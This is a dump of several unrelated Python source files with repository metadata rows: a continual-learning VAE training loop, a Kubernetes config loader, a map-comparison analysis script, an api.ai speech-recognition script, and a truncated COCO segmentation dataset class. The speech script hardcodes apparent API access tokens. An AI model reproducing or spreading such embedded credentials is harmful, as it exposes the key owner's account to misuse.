string = string + '_lbd%.1f' % lbd
if method == 'onlinevi' and K_mc > 1:
string = string + '_K%d' % K_mc
path_name = data_name + '_%s/' % string
if not os.path.isdir('save/'):
os.mkdir('save/')
if not os.path.isdir('save/'+path_name):
os.mkdir('save/'+path_name)
print('create path save/' + path_name)
filename = 'save/' + path_name + 'checkpoint'
if checkpoint < 0:
print('training from scratch')
old_var_list = init_variables(sess)
else:
load_params(sess, filename, checkpoint)
checkpoint += 1
# visualise the samples
N_gen = 10**2
path = 'figs/' + path_name
if not os.path.isdir('figs/'):
os.mkdir('figs/')
if not os.path.isdir(path):
os.mkdir(path)
print('create path ' + path)
X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')
# now start fitting
N_task = len(labels)
gen_ops = []
X_valid_list = []
X_test_list = []
eval_func_list = []
result_list = []
if method == 'onlinevi':
shared_prior_params = init_shared_prior()
if method in ['ewc', 'noreg']:
ewc_loss = 0.0
if method == 'laplace':
F_accum = init_fisher_accum()
laplace_loss = 0.0
if method == 'si':
old_params_shared = None
si_reg = None
n_layers_head = 2
n_layers_enc = n_layers_shared + n_layers_head - 1
for task in range(1, N_task+1):
# first load data
if data_name == 'mnist':
X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
if data_name == 'notmnist':
X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
N_train = int(X_train.shape[0] * 0.9)
X_valid_list.append(X_train[N_train:])
X_train = X_train[:N_train]
X_test_list.append(X_test)
# define the head net and the generator ops
dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
print('construct eval function...')
eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
batch_size_ph, K = 100, sample_W = False))
# then construct loss func and fit func
print('construct fit function...')
if method == 'onlinevi':
fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
shared_prior_params, task, K_mc)
if method in ['ewc', 'noreg']:
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
if method == 'ewc':
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'laplace':
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'si':
bound = lowerbound(X_ph, enc, dec, ll)
fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
si_reg, old_params_shared, lbd)
if old_params_shared is None:
old_params_shared = sess.run(shared_var_list)
# initialise all the uninitialised stuff
old_var_list = init_variables(sess, old_var_list)
# start training for each task
if method == 'si':
new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
else:
fit(sess, X_train, n_iter, lr)
# plot samples
x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
for i in range(len(x_gen_list)):
plot_images(x_gen_list[i], shape_high, path, \
data_name+'_gen_task%d_%d' % (task, i+1))
x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
x_list = np.concatenate(x_list, 0)
tmp = np.zeros([10, dimX])
tmp[:task] = x_list
if task == 1:
x_gen_all = tmp
else:
x_gen_all = np.concatenate([x_gen_all, tmp], 0)
# print test-ll on all tasks
tmp_list = []
for i in range(len(eval_func_list)):
print('task %d' % (i+1), end=' ')
test_ll = eval_func_list[i](sess, X_valid_list[i])
tmp_list.append(test_ll)
result_list.append(tmp_list)
# save param values
save_params(sess, filename, checkpoint)
checkpoint += 1
# update regularisers/priors
if method == 'ewc':
# update EWC loss
print('update ewc loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
if method == 'laplace':
# update EWC loss
print('update laplace loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
if method == 'onlinevi':
# update prior
print('update prior...')
shared_prior_params = update_shared_prior(sess, shared_prior_params)
# reset the variance of q
update_q_sigma(sess)
if method == 'si':
# update regularisers/priors
print('update SI big omega matrices...')
si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
old_params_shared, w_params_shared)
old_params_shared = new_params_shared
plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')
for i in range(len(result_list)):
print(result_list[i])
# save results
if not os.path.isdir("results/"):
os.mkdir("results/")
fname = 'results/' + data_name + '_%s.pkl' % string
import pickle
with open(fname, 'wb') as f:
pickle.dump(result_list, f)
print('test-ll results saved in', fname)
if __name__ == '__main__':
data_name = str(sys.argv[1])
method = str(sys.argv[2])
assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
if method == 'onlinevi':
lbd = 1.0 # some placeholder, doesn't matter
else:
lbd = float(sys.argv[3])
main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
| 40.166667
| 102
| 0.597183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,298
| 0.141734
|
35fb641cc4c232d5e95579ae3bf4fec4904fbdf7
| 1,663
|
py
|
Python
|
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | 1
|
2020-11-21T18:53:22.000Z
|
2020-11-21T18:53:22.000Z
|
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | null | null | null |
src/cltl/combot/infra/config/k8config.py
|
leolani/cltl-combot
|
7008742ba9db782166f79322658a8cb49890d61b
|
[
"MIT"
] | null | null | null |
import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
@staticmethod
def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
configs = additional_config_files
try:
copy_k8_config(k8_configs, k8_config_file)
configs += [k8_config_file]
except OSError:
logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)
local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
k8_configs = tuple(file for file in os.listdir(k8_config_dir) if not file.startswith("."))
logger.debug("Found kubernetes config maps %s in %s", k8_configs, k8_config_dir)
k8_sections = {section: _read_config(k8_config_dir, section)
for section in k8_configs}
with open(k8_config_file, 'w') as k8_cfg:
logger.info("Writing %s", k8_cfg)
for section_name, section_values in k8_sections.items():
k8_cfg.write(f"[{section_name}]\n")
k8_cfg.write(section_values)
k8_cfg.write("\n")
def _read_config(k8_configs, config_file):
logger.info("Loading %s/%s", k8_configs, config_file)
with open(os.path.join(k8_configs, config_file)) as cfg:
return cfg.read()
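# --- Minimal sketch (not from the original module; the section name and key
# below are made up). Each file in the kubernetes config-map directory is
# assumed to be named after an INI section and to hold that section's
# key/value lines. ---
if __name__ == '__main__':
    import tempfile
    with tempfile.TemporaryDirectory() as tmp_dir:
        with open(os.path.join(tmp_dir, 'cltl.demo'), 'w') as section_file:
            section_file.write('address: http://localhost:7200\n')
        out_file = os.path.join(tmp_dir, 'k8.config')
        copy_k8_config(tmp_dir, out_file)
        with open(out_file) as result:
            print(result.read())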
| 36.955556
| 116
| 0.710764
| 667
| 0.401082
| 0
| 0
| 584
| 0.351173
| 0
| 0
| 184
| 0.110643
|
35fb6a7aec8441ab62bd7a834d5a31a1a31bbbcf
| 17,640
|
py
|
Python
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 149
|
2020-06-23T12:08:47.000Z
|
2022-03-31T08:18:52.000Z
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 4
|
2020-08-28T07:51:15.000Z
|
2021-04-09T13:18:49.000Z
|
act_map/scripts/exp_compare_diff_maps.py
|
debugCVML/rpg_information_field
|
56f9ffba83aaee796502116e1cf651c5bc405bf6
|
[
"MIT"
] | 34
|
2020-06-26T14:50:34.000Z
|
2022-03-04T06:45:55.000Z
|
#!/usr/bin/env python
import os
import argparse
import yaml
import numpy as np
from colorama import init, Fore, Style
from matplotlib import rc
import matplotlib.pyplot as plt
import plot_utils as pu
init(autoreset=True)
rc('font', **{'serif': ['Cardo'], 'size': 20})
rc('text', usetex=True)
kMetrics = ['det', 'mineig', 'trace']
kMetricsLabels = ['$\det$', '$\lambda_{min}$', '${Tr}$']
kSecToUs = 1.0e6
kPallete = [
'blue', 'green', 'red', 'gold', 'purple', 'gray', 'cyan',
'midnightblue', 'lime', 'lightcoral', 'darkgoldenrod', 'violet', 'dimgray', 'darkorange',
'black'
]
def normalize(data, min_val=0.0, max_val=1.0):
data_valid = [v for v in data if v is not None]
dmax = np.max(data_valid)
dmin = np.min(data_valid)
ddata = dmax - dmin
ddes = max_val - min_val
return [(v - dmin) / ddata * ddes + min_val if v is not None else v for v in data]
def logAndNormalize(data, min_val=0.0, max_val=1.0):
data_log = [np.log(v) if v > 0 else None for v in data]
return normalize(data_log)
def readResults(res_dir, nm):
file_nms = sorted([v for v in os.listdir(res_dir) if v.endswith('.txt') and nm in v])
print("- Found files for map {}:\n - {}".format(nm, '\n - '.join(file_nms)))
print("- read general info")
gen_nm = "general_info_{}.txt".format(nm)
general_info = {}
if gen_nm in file_nms:
data = np.loadtxt(os.path.join(res_dir, gen_nm))
assert data.shape == (4,)
general_info['n_vox'] = data[0]
general_info['t_construct'] = data[1]
general_info['ker_mem_kb'] = data[2]
general_info['pc_mem_kb'] = data[3]
print("- read fim")
fim_vox_c_nm = 'fim_vox_c_{}.txt'.format(nm)
fim = {}
if fim_vox_c_nm in file_nms:
fim_vox_c_fn = os.path.join(res_dir, fim_vox_c_nm)
fim_map_fn = os.path.join(res_dir, "fim_map_{}.txt".format(nm))
fim_pc_fn = os.path.join(res_dir, "fim_pc_{}.txt".format(nm))
fim_vox_centers = np.loadtxt(fim_vox_c_fn)
assert fim_vox_centers.shape[1] == 3
n_fim = fim_vox_centers.shape[0]
print(Style.DIM + "Found {} FIM".format(n_fim))
fim_map = np.loadtxt(fim_map_fn)
assert fim_map.shape[1] == 36
assert n_fim == fim_map.shape[0]
fim_pc = np.loadtxt(fim_pc_fn)
assert fim_pc.shape[1] == 36
assert n_fim == fim_pc.shape[0]
fim['vox_c'] = fim_vox_centers
fim['map'] = [v.reshape((6, 6)) for v in fim_map]
fim['pc'] = [v.reshape((6, 6)) for v in fim_pc]
fim_time_map_fn = os.path.join(res_dir, "fim_time_map_{}.txt".format(nm))
fim_time_map = np.loadtxt(fim_time_map_fn)
fim_time_pc_fn = os.path.join(res_dir, "fim_time_pc_{}.txt".format(nm))
fim_time_pc = np.loadtxt(fim_time_pc_fn)
fim['map_time'] = fim_time_map
fim['map_time_mean'] = np.mean(fim_time_map)
fim['pc_time'] = fim_time_pc
fim['pc_time_mean'] = np.mean(fim_time_pc)
print(Style.DIM + "Aver. Map: {}. Aver. PC: {}".format(
fim['map_time_mean'], fim['pc_time_mean']))
else:
print(Fore.RED + "Nothing found.")
print("- read query time")
t_query = {}
for m in kMetrics:
t_map_fn = os.path.join(res_dir, 't_query_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(t_map_fn):
print(Fore.RED + "* metric {} does not exist for query time".format(m))
continue
t_pc_fn = os.path.join(res_dir, 't_query_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(t_pc_fn)
t_map = np.loadtxt(t_map_fn)
t_map_mean = np.mean(t_map)
t_pc = np.loadtxt(t_pc_fn)
t_pc_mean = np.mean(t_pc)
assert t_map.size == t_pc.size
print(Style.DIM + "* metric {}: {} samples, map aver. {}, pc aver. {}".format(
m, t_map.size, t_map_mean, t_pc_mean))
t_query[m] = {}
t_query[m]['map'] = t_map.ravel().tolist()
t_query[m]['map_mean'] = t_map_mean
t_query[m]['pc'] = t_pc.ravel().tolist()
t_query[m]['pc_mean'] = t_pc_mean
print("- read optimal orientations")
optim_orient = {}
oo_vox_c_fn = os.path.join(res_dir, 'optim_orient_vox_c_{}.txt'.format(nm))
assert os.path.exists(oo_vox_c_fn), oo_vox_c_fn
oo_vox_c = np.loadtxt(oo_vox_c_fn)
assert oo_vox_c.shape[1] == 3
n_oo = oo_vox_c.shape[0]
optim_orient['vox_c'] = oo_vox_c
print(Style.DIM + "Total {} samples".format(n_oo))
for m in kMetrics:
oo_map_fn = os.path.join(res_dir, 'optim_orient_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(oo_map_fn):
print(Fore.RED + "* metric {} does not exist for optimal orientations".format(m))
continue
else:
print(Style.DIM + "* metric {}".format(m))
oo_pc_fn = os.path.join(res_dir, 'optim_orient_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(oo_pc_fn)
optim_orient[m] = {}
oo_map = np.loadtxt(oo_map_fn)
assert oo_map.shape == (n_oo, 3)
oo_pc = np.loadtxt(oo_pc_fn)
assert oo_pc.shape == (n_oo, 3)
optim_orient[m]['map'] = oo_map
optim_orient[m]['pc'] = oo_pc
print("- read metrics for continous motion")
cont_metrics = {}
cont_rot_fn = os.path.join(res_dir, 'metric_cont_rot_{}.txt'.format(nm))
if os.path.exists(cont_rot_fn):
cont_trans_fn = os.path.join(res_dir, 'metric_cont_trans_{}.txt'.format(nm))
assert os.path.exists(cont_trans_fn)
cont_metrics['rot'] = {}
cont_rot = np.loadtxt(cont_rot_fn)
assert cont_rot.shape[0] == 2
print(Style.DIM + "{} rotations.".format(cont_rot.shape[1]))
cont_metrics['rot']['map'] = cont_rot[0].ravel().tolist()
cont_metrics['rot']['pc'] = cont_rot[1].ravel().tolist()
cont_metrics['trans'] = {}
cont_trans = np.loadtxt(cont_trans_fn)
assert cont_trans.shape[0] == 2
print(Style.DIM + "{} translations.".format(cont_trans.shape[1]))
cont_metrics['trans']['map'] = cont_trans[0].ravel().tolist()
cont_metrics['trans']['pc'] = cont_trans[1].ravel().tolist()
else:
print(Fore.RED + "Nothing found.")
return {"general_info": general_info, 'fim': fim, 't_query': t_query,
'optim_orient': optim_orient, 'cont_metrics': cont_metrics}
def _writeComplexityTable(nm_to_res, pc_res_key, selected_nms, nm_to_label, complexity_table_fn):
sel_labels = [nm_to_label[v] for v in selected_nms]
with open(complexity_table_fn, 'w') as f:
f.write('# PC {}\n'.format(' '.join(sel_labels)))
# construction time
f.write('t_construct (sec) ')
f.write('- ')
for nm in selected_nms:
f.write('{} '.format(nm_to_res[nm]['general_info']['t_construct']))
f.write('\n')
# memory
f.write('memory (MB) ')
f.write('{:.2f} '.format(nm_to_res[pc_res_key]['general_info']['pc_mem_kb'] / 1024.0))
for nm in selected_nms:
f.write('{:.2f} '.format(nm_to_res[nm]['general_info']['ker_mem_kb'] / 1024.0))
f.write('\n')
# query
# fim
f.write('# query (us)\n')
f.write('fim ')
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['fim']['pc_time_mean'] * kSecToUs))
for nm in selected_nms:
fim_res = nm_to_res[nm]['fim']
if 'map_time' not in fim_res:
f.write('- ')
else:
f.write('{:.1f} '.format(fim_res['map_time_mean'] * kSecToUs))
f.write('\n')
# metrics
for m in kMetrics:
f.write('{} '.format(m))
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['t_query'][m]['pc_mean'] * kSecToUs))
for nm in selected_nms:
t_query = nm_to_res[nm]['t_query']
if m not in t_query:
f.write('- ')
else:
f.write('{:.1f} '.format(t_query[m]['map_mean'] * kSecToUs))
f.write('\n')
def _computeAndWriteFIMDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
fim_fro_diff = {}
sel_labels = [nm_to_label[v] for v in selected_nms]
for nm in selected_nms:
print('- calculating {}'.format(nm))
fim_pc = nm_to_res[nm]['fim']['pc']
fim_map = nm_to_res[nm]['fim']['map']
fim_diff_perc = []
for fim_pc_i, fim_map_i in zip(fim_pc, fim_map):
fro_pc_i = np.linalg.norm(fim_pc_i)
fro_dfim_i = np.linalg.norm(fim_map_i - fim_pc_i)
fim_diff_perc.append(fro_dfim_i / fro_pc_i * 100)
if top_save_dir:
with open(os.path.join(top_save_dir, 'fim_fro_diff_perc_{}.txt'.format(nm)), 'w') as f:
f.write('# each item is one percentage of FIM difference w.r.t. point cloud\n')
f.write('{}'.format(' '.join(['{:.2f}'.format(v) for v in fim_diff_perc])))
fim_fro_diff[nm] = fim_diff_perc
print(Style.DIM + "* {}: {} ({})".format(nm, np.median(fim_diff_perc), np.std(fim_diff_perc)))
if top_save_dir:
print('- writing table')
with open(os.path.join(top_save_dir, 'fim_fro_diff_table.txt'), 'w') as f:
f.write('# Median (std): {}\n'.format(' '.join(sel_labels)))
for nm in selected_nms:
diff_perc = fim_fro_diff[nm]
f.write("{} ({}) ".format(np.median(diff_perc), np.std(diff_perc)))
return fim_fro_diff
def _boxplotFIMDiffs(nm_to_fim_diff_perc, names, nm_to_label, top_save_dir):
xlabels = [nm_to_label[v] for v in names]
data_labels = ['FIM Diff']
colors = [kPallete[0]]
data = []
for nm in names:
data.append(nm_to_fim_diff_perc[nm])
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, [data], data_labels, colors, legend=False)
ax.set_ylabel("FIM diff. (\%)")
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'fim_diffs_boxplot.png'), bbox_inches='tight')
def _computeAndWriteOptimalOrientDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
orient_diffs = {}
for nm in selected_nms:
print('- calculating {} ...'.format(nm))
orient_diff_per_metric = {}
oo_results = nm_to_res[nm]['optim_orient']
for m in kMetrics:
diffs_i = []
for o_map, o_pc in zip(oo_results[m]['map'], oo_results[m]['pc']):
cos_val = max(-1.0,
min(1.0,
np.dot(o_map, o_pc) / (np.linalg.norm(o_map) * np.linalg.norm(o_pc))))
diffs_i.append(np.rad2deg(np.arccos(cos_val)))
print(Style.DIM + "{}: {} ({})".format(m, np.median(diffs_i), np.std(diffs_i)))
orient_diff_per_metric[m] = diffs_i
orient_diffs[nm] = orient_diff_per_metric
if top_save_dir:
with open(os.path.join(top_save_dir, 'orient_diffs_{}.txt'.format(nm)), 'w') as f:
for m in kMetrics:
f.write('{} {}\n'.format(m, ' '.join([str(v)
for v in orient_diff_per_metric[m]])))
return orient_diffs
def _boxplotOrientDiffs(orient_diffs, names, nm_to_label, top_save_dir):
xlabels = kMetricsLabels
data_labels = [nm_to_label[v] for v in names]
colors = [kPallete[i] for i, v in enumerate(names)]
data = []
for nm in names:
data_i = []
for m in kMetrics:
data_i.append(orient_diffs[nm][m])
data.append(data_i)
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(111)
pu.boxplot_compare(ax, xlabels, data, data_labels, colors)
ax.set_ylabel("Orientation diff. (deg)")
plt.tight_layout()
fig.savefig(os.path.join(top_save_dir, 'orient_diffs_boxplot.png'), bbox_inches='tight')
def _compareContinuousMotion(nm_to_res, selected_nms, nm_to_label, top_save_dir):
pc_cont_motion_res = nm_to_res[selected_nms[0]]
pc_rot_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['rot']['pc'])
pc_trans_metrics = logAndNormalize(pc_cont_motion_res['cont_metrics']['trans']['pc'])
fig_rot = plt.figure(figsize=(8, 6))
ax_rot = fig_rot.add_subplot(111)
ax_rot.plot(pc_rot_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_rot.plot(logAndNormalize(nm_to_res[nm_i]['cont_metrics']
['rot']['map']), label=nm_to_label[nm_i])
ax_rot.set_xticks([])
ax_rot.set_xlabel('Continuous Rotation')
ax_rot.set_ylabel('Normalized Det.')
plt.legend()
plt.tight_layout()
fig_rot.savefig(os.path.join(top_save_dir, 'continuous_rotation.png'), bbox_inches='tight')
fig_trans = plt.figure(figsize=(8, 6))
ax_trans = fig_trans.add_subplot(111)
ax_trans.plot(pc_trans_metrics, label='Point Cloud')
for nm_i in selected_nms:
ax_trans.plot(logAndNormalize(nm_to_res[nm_i]
['cont_metrics']['trans']['map']), label=nm_to_label[nm_i])
ax_trans.set_xticks([])
ax_trans.set_xlabel('Continuous Translation')
# ax_trans.set_ylabel('Normalized Det.')
# plt.legend()
plt.tight_layout()
fig_trans.savefig(os.path.join(top_save_dir, 'continuous_translation.png'), bbox_inches='tight')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--res_dir', required=True)
parser.add_argument('--analyze_config', required=True)
parser.add_argument('--save_dir', type=str, default='analysis_results')
parser.add_argument('--pc_res_key', type=str, default='quad_info_0p5')
parser.set_defaults(map_names=['quad_info', 'quad_trace', 'gp_info', 'gp_trace'])
args = parser.parse_args()
print(Fore.YELLOW + args.__dict__.__str__())
with open(args.analyze_config, 'r') as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
print("Read configurations:\n{}".format(cfg))
map_names = []
map_nm_to_label = {}
for d in cfg['all_maps']:
map_nm_to_label.update(d)
for k in d:
map_names.append(k)
print(Fore.GREEN + "Maps to compare:\n- {}".format('\n- '.join(map_names)))
print(Fore.GREEN + "Labels:\n{}".format(map_nm_to_label))
fim_map_nms = [v for v in map_names if 'info' in v]
compare_orient_map_nms = [v for v in map_names if 'info' in v]
compare_cont_motion_map_nms = [v for v in map_names if 'info' in v]
print("Will analyze FIM for {}".format(fim_map_nms))
print("Will compare orientations for {}".format(compare_orient_map_nms))
print("Will compare cont. motion for {}".format(compare_cont_motion_map_nms))
save_dir = os.path.join(args.res_dir, args.save_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
else:
print(Fore.RED + "Save folder exists, will re-use and overwrite.")
print("Going to save to {}".format(save_dir))
map_nm_to_res = {}
for map_nm in map_names:
print(Fore.GREEN + "====> Reading {}...".format(map_nm))
map_nm_to_res[map_nm] = readResults(args.res_dir, map_nm)
print(Fore.YELLOW + Style.BRIGHT + "Start analysis.")
print(Fore.GREEN + "1. Table of complexity.")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, map_names, map_nm_to_label,
os.path.join(save_dir, 'complexity_table.txt'))
print(Fore.GREEN + "2. FIM difference.")
map_nm_to_fim_diff_perc = _computeAndWriteFIMDiff(
map_nm_to_res, fim_map_nms, map_nm_to_label, save_dir)
_boxplotFIMDiffs(map_nm_to_fim_diff_perc, fim_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "3. Optimal views.")
map_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, compare_orient_map_nms, map_nm_to_label, save_dir)
_boxplotOrientDiffs(map_nm_to_orient_diff, compare_orient_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + "4. Continous motion.")
_compareContinuousMotion(map_nm_to_res, compare_cont_motion_map_nms, map_nm_to_label, save_dir)
print(Fore.GREEN + Style.BRIGHT + "Start processing specified subsets...")
sel_dir = os.path.join(save_dir, 'selected_results')
if not os.path.exists(sel_dir):
os.makedirs(sel_dir)
if 'sel_complexity_table_entries' in cfg:
print(Fore.GREEN + "- complexity table")
_writeComplexityTable(map_nm_to_res, args.pc_res_key, cfg['sel_complexity_table_entries'], map_nm_to_label, os.path.join(
sel_dir, 'complexity_table.txt'))
if 'sel_fro_norm_table_entries' in cfg:
print(Fore.GREEN + "- FIM diff. table")
sel_fim_nms = cfg['sel_fro_norm_table_entries']
sel_nm_to_fim_diff = _computeAndWriteFIMDiff(
map_nm_to_res, sel_fim_nms, map_nm_to_label, sel_dir)
_boxplotFIMDiffs(sel_nm_to_fim_diff, sel_fim_nms, map_nm_to_label, sel_dir)
if 'sel_hist_orient_entries' in cfg:
sel_orient_nms = cfg['sel_hist_orient_entries']
print(Fore.GREEN + "- Orientation diff.")
sel_nm_to_orient_diff = _computeAndWriteOptimalOrientDiff(
map_nm_to_res, sel_orient_nms, map_nm_to_label, sel_dir)
_boxplotOrientDiffs(sel_nm_to_orient_diff, sel_orient_nms, map_nm_to_label, sel_dir)
if 'sel_cont_motion_plot' in cfg:
print(Fore.GREEN + "- continuous motion")
_compareContinuousMotion(
map_nm_to_res, cfg['sel_cont_motion_plot'], map_nm_to_label, sel_dir)
| 41.505882
| 129
| 0.626361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,335
| 0.189059
|
35fbe8e8b4f1e1aa102f85306945ce878960b4de
| 52
|
py
|
Python
|
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
grintor/Hello-Wolrd-CI
|
1f1b8c40f55d0b35cd73601ed90567a84abf03db
|
[
"Apache-2.0"
] | null | null | null |
# see: https://stackoverflow.com/a/34520971/3238695
| 26
| 51
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.980769
|
35fc69cf4551ec557452a3db41e67d9efead2ebf
| 1,318
|
py
|
Python
|
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | null | null | null |
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | null | null | null |
Files/SpeechRecognition/speechDandR.py
|
JahnaviDoneria/HomeAutomationSystem
|
0419ba4a0fefd16b9a5c7a19fef7897d76850dc2
|
[
"MIT"
] | 1
|
2020-01-20T13:04:55.000Z
|
2020-01-20T13:04:55.000Z
|
import json
import apiai
import speech_recognition as sr
def speechRecognition():
recog = sr.Recognizer()
    with sr.Microphone() as source:
        print("It's your cue")
        i = True
        while i is True:
            # listen inside the loop so a failed recognition records a new attempt
            audio = recog.listen(source)
            try:
                text = recog.recognize_google(audio)
                i = False
                speechPrediction(text)
            except sr.UnknownValueError:
                print("Please speak again")
            except sr.RequestError:
                print("Please check your connection")
def speechPrediction(text):
CLIENT_ACCESS_TOKEN = "6bcf8d38ee7344989af9aee9b0ffee11"
DEVELOPER_ACCESS_TOKEN = "cae24c147f4d4af0b58ebbed1d97ad1b"
ai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
requests = ai.text_request()
requests.query = text
requests.lang = "en"
response = requests.getresponse()
print(response)
intent,room = JSONresponse(response)
return intent,room
def JSONresponse(response):
json_response = json.loads(response.read().decode('utf-8'))
intent= []
room= []
print(json_response)
print('...')
result = json_response['result']
intent = result['action']
print(intent)
room_result = result['parameters']
room = room_result['room']
print(room)
return intent,room
#speechRecognition()
| 23.122807
| 63
| 0.651745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 203
| 0.154021
|
35fcbb05f8e3b57b8ab5311822807b3114647a9f
| 4,667
|
py
|
Python
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 66
|
2018-07-20T04:01:41.000Z
|
2021-11-08T10:40:49.000Z
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 6
|
2018-08-16T08:06:39.000Z
|
2020-11-28T13:07:21.000Z
|
mylib/dataset/coco.py
|
duducheng/deeplabv3p_gluon
|
fd8e3e8d834838a9a221785b825499c62cee578f
|
[
"Apache-2.0"
] | 11
|
2018-07-20T18:00:29.000Z
|
2020-04-28T15:21:58.000Z
|
# raise NotImplementedError("Did not check!")
"""MSCOCO Semantic Segmentation pretraining for VOC."""
import os
from tqdm import trange
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import pickle
from gluoncv.data.segbase import SegmentationDataset
class COCOSegmentation(SegmentationDataset):
CAT_LIST = [0, 5, 2, 16, 9, 44, 6, 3, 17, 62, 21, 67, 18, 19, 4,
1, 64, 20, 63, 7, 72]
NUM_CLASS = 21
def __init__(self, root=os.path.expanduser('~/.mxnet/datasets/coco'),
split='train', mode=None, transform=None):
super(COCOSegmentation, self).__init__(root, split, mode, transform)
from pycocotools.coco import COCO
from pycocotools import mask
if split == 'train':
print('train set')
ann_file = os.path.join(root, 'annotations/instances_train2017.json')
ids_file = os.path.join(root, 'annotations/train_ids.mx')
self.root = os.path.join(root, 'train2017')
else:
print('val set')
ann_file = os.path.join(root, 'annotations/instances_val2017.json')
ids_file = os.path.join(root, 'annotations/val_ids.mx')
self.root = os.path.join(root, 'val2017')
self.coco = COCO(ann_file)
self.coco_mask = mask
if os.path.exists(ids_file):
with open(ids_file, 'rb') as f:
self.ids = pickle.load(f)
else:
ids = list(self.coco.imgs.keys())
self.ids = self._preprocess(ids, ids_file)
self.transform = transform
# self.root = os.path.join(root, 'train2017') if split == 'train' else \
# os.path.join(root, 'val2017')
def __getitem__(self, index):
coco = self.coco
img_id = self.ids[index]
